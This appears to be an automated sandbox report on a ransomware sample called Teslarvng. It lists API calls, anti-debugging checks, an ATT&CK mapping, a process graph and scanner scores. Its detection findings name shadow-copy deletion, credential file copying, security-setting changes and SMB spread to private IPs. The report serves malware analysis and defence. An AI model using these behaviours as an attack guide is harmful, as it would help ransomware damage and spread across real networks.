Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E64900 FindFirstFileW,FindFirstFileW,FindClose,15_2_00E64900
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E64AE0 FindFirstFileW,FindNextFileW,GetLastError,FindClose,GetLastError,__Mtx_unlock,__Mtx_unlock,__Mtx_unlock,__Mtx_unlock,GetVolumeNameForVolumeMountPointW,GetCurrentThread,SetThreadPriority,__Init_thread_footer,__Init_thread_footer,15_2_00E64AE0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E665E0 Sleep,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_init_in_situ,__Mtx_unlock,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,FindFirstFileW,FindNextFileW,GetLastError,GetLastError,FindClose,__Mtx_unlock,__Mtx_unlock,GetCurrentThreadId,15_2_00E665E0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeThread delayed: delay time: 120000Jump to behavior
Source: svchost.exe, 00000001.00000002.213645430.000001B5D2540000.00000002.00000001.sdmp, sc.exe, 0000000B.00000002.231729600.00000230F2D50000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.277781486.000001CB45CA0000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.469520725.00000247C3340000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.303271953.000002A912940000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 0000000A.00000002.468020794.0000018BB5644000.00000004.00000001.sdmpBinary or memory string: ar&Prod_VMware_SATA_CD00#5&280b6
Source: svchost.exe, 00000012.00000002.472236707.000001A909062000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000012.00000002.472211830.000001A90904C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000014.00000002.467794755.0000018E4B202000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000001.00000002.213645430.000001B5D2540000.00000002.00000001.sdmp, sc.exe, 0000000B.00000002.231729600.00000230F2D50000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.277781486.000001CB45CA0000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.469520725.00000247C3340000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.303271953.000002A912940000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.213645430.000001B5D2540000.00000002.00000001.sdmp, sc.exe, 0000000B.00000002.231729600.00000230F2D50000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.277781486.000001CB45CA0000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.469520725.00000247C3340000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.303271953.000002A912940000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000014.00000002.467911105.0000018E4B23C000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.467779892.000001E4FEE24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000002.213645430.000001B5D2540000.00000002.00000001.sdmp, sc.exe, 0000000B.00000002.231729600.00000230F2D50000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.277781486.000001CB45CA0000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.469520725.00000247C3340000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.303271953.000002A912940000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EABE03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EABE03
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8CCF0 LoadLibraryA,GetProcAddress,0_2_00E8CCF0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EB72AB mov eax, dword ptr fs:[00000030h]0_2_00EB72AB
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EAF01E mov eax, dword ptr fs:[00000030h]0_2_00EAF01E
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EB72EF mov eax, dword ptr fs:[00000030h]0_2_00EB72EF
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EAF01E mov eax, dword ptr fs:[00000030h]15_2_00EAF01E
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EB72EF mov eax, dword ptr fs:[00000030h]15_2_00EB72EF
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E890C0 RegOpenKeyExW,SetLastError,RegQueryValueExW,GetProcessHeap,HeapAlloc,RegCloseKey,RegQueryValueExW,RegCloseKey,lstrcmpiA,RegCloseKey,wsprintfA,HeapFree,SetLastError,0_2_00E890C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EA793D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00EA793D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EABE03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EABE03
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA793D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00EA793D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA85AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00EA85AE
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EABE03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00EABE03
Source: svchost.exe, 00000016.00000002.468864378.000001E50E860000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: svchost.exe, 00000016.00000002.468864378.000001E50E860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000016.00000002.468864378.000001E50E860000.00000002.00000001.sdmpBinary or memory string: Progman
Source: svchost.exe, 00000016.00000002.468864378.000001E50E860000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E57820 cpuid 0_2_00E57820
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,0_2_00EBF872
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,0_2_00EBF827
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00EBF9A0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,0_2_00EB598D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,0_2_00EBF90D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,0_2_00EBFC00
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00EBF57F
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00EBFD26
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00EBFEFB
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,0_2_00EB5ED0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,0_2_00EBFE2C
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,0_2_00EBF780
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,15_2_00EBF872
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,15_2_00EBF827
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,15_2_00EB598D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: EnumSystemLocalesW,15_2_00EBF90D
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00EBF57F
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_00EBFD26
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00EBFEFB
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetLocaleInfoW,15_2_00EB5ED0
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EA728A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00EA728A

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)Show sources
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
Source: svchost.exe, 0000001A.00000002.468473343.0000013F7D040000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000001A.00000002.468445060.0000013F7D02A000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting1Windows Service4Access Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsNative API1Logon Script (Windows)Windows Service4Scripting1Security Account ManagerSystem Information Discovery44SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsService Execution3Logon Script (Mac)Process Injection2Obfuscated Files or Information2NTDSNetwork Share Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery51SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection2Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 426176 Sample: 3PSo7GcHhV.exe Startdate: 28/05/2021 Architecture: WINDOWS Score: 84 47 Multi AV Scanner detection for submitted file 2->47 49 Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities 2->49 51 Deletes shadow drive data (may be related to ransomware) 2->51 53 Sigma detected: Copying Sensitive Files with Credential Data 2->53 7 3PSo7GcHhV.exe 7 2->7         started        11 svchost.exe 2->11         started        13 3PSo7GcHhV.exe 2 2->13         started        15 12 other processes 2->15 process3 dnsIp4 39 192.168.2.100 unknown unknown 7->39 41 192.168.2.101 unknown unknown 7->41 45 97 other IPs or domains 7->45 55 Connects to many different private IPs via SMB (likely to spread or exploit) 7->55 57 Connects to many different private IPs (likely to spread or exploit) 7->57 59 Protects its processes via BreakOnTermination flag 7->59 63 2 other signatures 7->63 17 cmd.exe 1 7->17         started        19 vssadmin.exe 1 7->19         started        21 sc.exe 1 7->21         started        25 3 other processes 7->25 61 Changes security center settings (notifications, updates, antivirus, firewall) 11->61 23 MpCmdRun.exe 1 11->23         started        43 127.0.0.1 unknown unknown 15->43 signatures5 process6 process7 27 conhost.exe 17->27         started        29 conhost.exe 19->29         started        31 conhost.exe 21->31         started        33 conhost.exe 23->33         started        35 conhost.exe 25->35         started        37 conhost.exe 25->37         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
3PSo7GcHhV.exe63%VirustotalBrowse
3PSo7GcHhV.exe37%MetadefenderBrowse
3PSo7GcHhV.exe66%ReversingLabsWin32.Ransomware.Teslarvng

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.1.3PSo7GcHhV.exe.e50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
15.1.3PSo7GcHhV.exe.e50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://%s.xboxlive.com0%URL Reputationsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://dynamic.t0%URL Reputationsafe
https://dynamic.t0%URL Reputationsafe
https://dynamic.t0%URL Reputationsafe
https://dynamic.t0%URL Reputationsafe
https://www.sysinternals.com00%Avira URL Cloudsafe
http://schemas.dmtf.0%Avira URL Cloudsafe
https://%s.dnet.xboxlive.com0%URL Reputationsafe
https://%s.dnet.xboxlive.com0%URL Reputationsafe
https://%s.dnet.xboxlive.com0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
    high
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000018.00000003.308890946.0000026BA5245000.00000004.00000001.sdmpfalse
      high
      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpfalse
        high
        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
          high
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpfalse
            high
            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000018.00000002.309109550.0000026BA5255000.00000004.00000001.sdmpfalse
              high
              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumeratesvchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpfalse
                  high
                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000018.00000003.308890946.0000026BA5245000.00000004.00000001.sdmpfalse
                    high
                    https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                      high
                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpfalse
                        high
                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000018.00000002.309053653.0000026BA5213000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpfalse
                          high
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000018.00000003.308895238.0000026BA5241000.00000004.00000001.sdmpfalse
                            high
                            https://%s.xboxlive.comsvchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000018.00000002.309109550.0000026BA5255000.00000004.00000001.sdmpfalse
                              high
                              https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000018.00000003.287137774.0000026BA5231000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpfalse
                                      high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000018.00000003.287137774.0000026BA5231000.00000004.00000001.sdmpfalse
                                        high
                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000012.00000002.471911461.000001A908F60000.00000002.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000018.00000003.308895238.0000026BA5241000.00000004.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/08/addressingsvchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpfalse
                                                high
                                                https://dynamic.tsvchost.exe, 00000018.00000002.309120481.0000026BA5264000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://www.sysinternals.com03PSo7GcHhV.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000018.00000002.309086963.0000026BA523A000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000018.00000002.309101022.0000026BA5247000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.dmtf.svchost.exe, 00000012.00000002.468552797.000001A9038AC000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://activity.windows.comsvchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.bingmapsportal.comsvchost.exe, 00000018.00000002.309053653.0000026BA5213000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000018.00000003.308850065.0000026BA5260000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000018.00000002.309091783.0000026BA523E000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://%s.dnet.xboxlive.comsvchost.exe, 00000015.00000002.467919129.00000247C2645000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000018.00000003.308863892.0000026BA524B000.00000004.00000001.sdmpfalse
                                                                  high

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious

                                                                  Private

                                                                  IP
                                                                  192.168.2.148
                                                                  192.168.2.149
                                                                  192.168.2.146
                                                                  192.168.2.147
                                                                  192.168.2.140
                                                                  192.168.2.141
                                                                  192.168.2.144
                                                                  192.168.2.145
                                                                  192.168.2.142
                                                                  192.168.2.143
                                                                  192.168.2.159
                                                                  192.168.2.157
                                                                  192.168.2.158
                                                                  192.168.2.151
                                                                  192.168.2.152
                                                                  192.168.2.150
                                                                  192.168.2.155
                                                                  192.168.2.156
                                                                  192.168.2.153
                                                                  192.168.2.154
                                                                  192.168.2.126
                                                                  192.168.2.127
                                                                  192.168.2.124
                                                                  192.168.2.125
                                                                  192.168.2.128
                                                                  192.168.2.129
                                                                  192.168.2.122
                                                                  192.168.2.123
                                                                  192.168.2.120
                                                                  192.168.2.121
                                                                  192.168.2.97
                                                                  192.168.2.137
                                                                  192.168.2.96
                                                                  192.168.2.138
                                                                  192.168.2.99
                                                                  192.168.2.135
                                                                  192.168.2.98
                                                                  192.168.2.136
                                                                  192.168.2.139
                                                                  192.168.2.130
                                                                  192.168.2.91
                                                                  192.168.2.90
                                                                  192.168.2.93
                                                                  192.168.2.133
                                                                  192.168.2.92
                                                                  192.168.2.134
                                                                  192.168.2.95
                                                                  192.168.2.131
                                                                  192.168.2.94
                                                                  192.168.2.132
                                                                  192.168.2.104
                                                                  192.168.2.225
                                                                  192.168.2.105
                                                                  192.168.2.226
                                                                  192.168.2.102
                                                                  192.168.2.223
                                                                  192.168.2.103
                                                                  192.168.2.224
                                                                  192.168.2.108
                                                                  192.168.2.229
                                                                  192.168.2.109
                                                                  192.168.2.106
                                                                  192.168.2.227
                                                                  192.168.2.107
                                                                  192.168.2.228
                                                                  192.168.2.100
                                                                  192.168.2.221
                                                                  192.168.2.101
                                                                  192.168.2.222
                                                                  192.168.2.220
                                                                  192.168.2.115
                                                                  192.168.2.116
                                                                  192.168.2.113
                                                                  192.168.2.114
                                                                  192.168.2.119
                                                                  192.168.2.117
                                                                  192.168.2.118
                                                                  192.168.2.111
                                                                  192.168.2.112
                                                                  192.168.2.230
                                                                  127.0.0.1
                                                                  192.168.2.110
                                                                  192.168.2.231
                                                                  192.168.2.203
                                                                  192.168.2.204
                                                                  192.168.2.201
                                                                  192.168.2.202
                                                                  192.168.2.207
                                                                  192.168.2.208
                                                                  192.168.2.205
                                                                  192.168.2.206
                                                                  192.168.2.200
                                                                  192.168.2.209
                                                                  192.168.2.214
                                                                  192.168.2.215
                                                                  192.168.2.212
                                                                  192.168.2.213
                                                                  192.168.2.218
                                                                  192.168.2.219
                                                                  192.168.2.216

                                                                  General Information

                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                  Analysis ID:426176
                                                                  Start date:28.05.2021
                                                                  Start time:12:59:09
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 9m 30s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:3PSo7GcHhV.exe
                                                                  Cookbook file name:default.jbs
